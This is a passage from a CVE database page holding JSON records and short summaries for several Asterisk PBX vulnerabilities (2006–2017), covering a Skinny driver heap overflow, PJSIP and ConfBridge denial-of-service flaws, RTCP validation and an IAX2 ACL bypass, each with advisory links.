            "url": "http://www.asterisk.org/node/109"
          },
          {
            "name": "20061018 Security-Assessment.com Advisory: Asterisk remote heap overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/449127/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-10-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "22480",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22480"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
        },
        {
          "name": "DSA-1229",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.us.debian.org/security/2006/dsa-1229"
        },
        {
          "name": "GLSA-200610-15",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
        },
        {
          "name": "SUSE-SA:2006:069",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
        },
        {
          "name": "20617",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/20617"
        },
        {
          "name": "ADV-2006-4097",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/4097"
        },
        {
          "name": "22651",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22651"
        },
        {
          "name": "29972",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/29972"
        },
        {
          "name": "OpenPKG-SA-2006.024",
          "tags": [
            "vendor-advisory",
            "x_refsource_OPENPKG"
          ],
          "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
        },
        {
          "name": "20061018 Asterisk remote heap overflow",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html"
        },
        {
          "name": "23212",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/23212"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12"
        },
        {
          "name": "asterisk-getinput-code-execution(29663)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29663"
        },
        {
          "name": "VU#521252",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/521252"
        },
        {
          "name": "1017089",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1017089"
        },
        {
          "name": "22979",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22979"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/109"
        },
        {
          "name": "20061018 Security-Assessment.com Advisory: Asterisk remote heap overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/449127/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-5444",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "22480",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22480"
            },
            {
              "name": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
            },
            {
              "name": "DSA-1229",
              "refsource": "DEBIAN",
              "url": "http://www.us.debian.org/security/2006/dsa-1229"
            },
            {
              "name": "GLSA-200610-15",
              "refsource": "GENTOO",
              "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
            },
            {
              "name": "SUSE-SA:2006:069",
              "refsource": "SUSE",
              "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
            },
            {
              "name": "20617",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/20617"
            },
            {
              "name": "ADV-2006-4097",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/4097"
            },
            {
              "name": "22651",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22651"
            },
            {
              "name": "29972",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/29972"
            },
            {
              "name": "OpenPKG-SA-2006.024",
              "refsource": "OPENPKG",
              "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
            },
            {
              "name": "20061018 Asterisk remote heap overflow",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html"
            },
            {
              "name": "23212",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/23212"
            },
            {
              "name": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12",
              "refsource": "CONFIRM",
              "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12"
            },
            {
              "name": "asterisk-getinput-code-execution(29663)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29663"
            },
            {
              "name": "VU#521252",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/521252"
            },
            {
              "name": "1017089",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1017089"
            },
            {
              "name": "22979",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22979"
            },
            {
              "name": "http://www.asterisk.org/node/109",
              "refsource": "CONFIRM",
              "url": "http://www.asterisk.org/node/109"
            },
            {
              "name": "20061018 Security-Assessment.com Advisory: Asterisk remote heap overflow",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/449127/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-5444",
    "datePublished": "2006-10-23T17:00:00",
    "dateReserved": "2006-10-23T00:00:00",
    "dateUpdated": "2024-08-07T19:48:30.383Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-17850

Vulnerability from cvelistv5

Published

2017-12-23 00:00

Modified

2024-08-05 21:06

Severity ?

Summary

An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-27480	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1040056	vdb-entry, x_refsource_SECTRACK
	https://security.gentoo.org/glsa/201811-11	vendor-advisory, x_refsource_GENTOO
	http://downloads.asterisk.org/pub/security/AST-2017-014.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T21:06:49.280Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27480"
          },
          {
            "name": "1040056",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040056"
          },
          {
            "name": "GLSA-201811-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201811-11"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-014.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-12-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-25T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27480"
        },
        {
          "name": "1040056",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040056"
        },
        {
          "name": "GLSA-201811-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201811-11"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-014.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-17850",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27480",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27480"
            },
            {
              "name": "1040056",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040056"
            },
            {
              "name": "GLSA-201811-11",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201811-11"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-014.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-014.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-17850",
    "datePublished": "2017-12-23T00:00:00",
    "dateReserved": "2017-12-22T00:00:00",
    "dateUpdated": "2024-08-05T21:06:49.280Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8414

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

ConfBridge in Asterisk 11.x before 11.14.1 and Certified Asterisk 11.6 before 11.6-cert8 does not properly handle state changes, which allows remote attackers to cause a denial of service (channel hang and memory consumption) by causing transitions to be delayed, which triggers a state change from hung up to waiting for media.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-014.html	x_refsource_CONFIRM
	http://seclists.org/fulldisclosure/2014/Nov/67	mailing-list, x_refsource_FULLDISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:47.850Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-014.html"
          },
          {
            "name": "20141121 AST-2014-014: High call load may result in hung channels in ConfBridge.",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2014/Nov/67"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "ConfBridge in Asterisk 11.x before 11.14.1 and Certified Asterisk 11.6 before 11.6-cert8 does not properly handle state changes, which allows remote attackers to cause a denial of service (channel hang and memory consumption) by causing transitions to be delayed, which triggers a state change from hung up to waiting for media."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-12-12T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-014.html"
        },
        {
          "name": "20141121 AST-2014-014: High call load may result in hung channels in ConfBridge.",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2014/Nov/67"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8414",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ConfBridge in Asterisk 11.x before 11.14.1 and Certified Asterisk 11.6 before 11.6-cert8 does not properly handle state changes, which allows remote attackers to cause a denial of service (channel hang and memory consumption) by causing transitions to be delayed, which triggers a state change from hung up to waiting for media."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-014.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-014.html"
            },
            {
              "name": "20141121 AST-2014-014: High call load may result in hung channels in ConfBridge.",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2014/Nov/67"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8414",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:47.850Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-14603

Vulnerability from cvelistv5

Published

2017-10-09 14:00

Modified

2024-08-05 19:34

Severity ?

Summary

In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the "nat" and "symmetric_rtp" options allow redirecting where Asterisk sends the next RTCP report.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2017-008.html	x_refsource_CONFIRM
	http://www.debian.org/security/2017/dsa-3990	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-27274	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T19:34:39.860Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-008.html"
          },
          {
            "name": "DSA-3990",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2017/dsa-3990"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27274"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-09-01T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the \"nat\" and \"symmetric_rtp\" options allow redirecting where Asterisk sends the next RTCP report."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-10-09T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-008.html"
        },
        {
          "name": "DSA-3990",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2017/dsa-3990"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27274"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-14603",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In Asterisk 11.x before 11.25.3, 13.x before 13.17.2, and 14.x before 14.6.2 and Certified Asterisk 11.x before 11.6-cert18 and 13.x before 13.13-cert6, insufficient RTCP packet validation could allow reading stale buffer contents and when combined with the \"nat\" and \"symmetric_rtp\" options allow redirecting where Asterisk sends the next RTCP report."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-008.html"
            },
            {
              "name": "DSA-3990",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2017/dsa-3990"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27274",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27274"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-14603",
    "datePublished": "2017-10-09T14:00:00",
    "dateReserved": "2017-09-19T00:00:00",
    "dateUpdated": "2024-08-05T19:34:39.860Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-4737

Vulnerability from cvelistv5

Published

2012-08-31 14:00

Modified

2024-08-06 20:42

Severity ?

Summary

channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert7, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 does not enforce ACL rules during certain uses of peer credentials, which allows remote authenticated users to bypass intended outbound-call restrictions by leveraging the availability of these credentials.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2012-013.html	x_refsource_CONFIRM
	http://secunia.com/advisories/50687	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/50756	third-party-advisory, x_refsource_SECUNIA
	http://www.securitytracker.com/id?1027461	vdb-entry, x_refsource_SECTRACK
	http://www.debian.org/security/2012/dsa-2550	vendor-advisory, x_refsource_DEBIAN
	http://www.securityfocus.com/bid/55335	vdb-entry, x_refsource_BID

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:42:55.248Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-013.html"
          },
          {
            "name": "50687",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50687"
          },
          {
            "name": "50756",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50756"
          },
          {
            "name": "1027461",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027461"
          },
          {
            "name": "DSA-2550",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2550"
          },
          {
            "name": "55335",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/55335"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-08-30T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert7, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 does not enforce ACL rules during certain uses of peer credentials, which allows remote authenticated users to bypass intended outbound-call restrictions by leveraging the availability of these credentials."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-10-31T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-013.html"
        },
        {
          "name": "50687",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50687"
        },
        {
          "name": "50756",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50756"
        },
        {
          "name": "1027461",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027461"
        },
        {
          "name": "DSA-2550",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2550"
        },
        {
          "name": "55335",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/55335"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-4737",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert7, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 does not enforce ACL rules during certain uses of peer credentials, which allows remote authenticated users to bypass intended outbound-call restrictions by leveraging the availability of these credentials."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-013.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-013.html"
            },
            {
              "name": "50687",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50687"
            },
            {
              "name": "50756",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50756"
            },
            {
              "name": "1027461",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027461"
            },
            {
              "name": "DSA-2550",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2550"
            },
            {
              "name": "55335",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/55335"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-4737",
    "datePublished": "2012-08-31T14:00:00",
    "dateReserved": "2012-08-30T00:00:00",
    "dateUpdated": "2024-08-06T20:42:55.248Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-6609

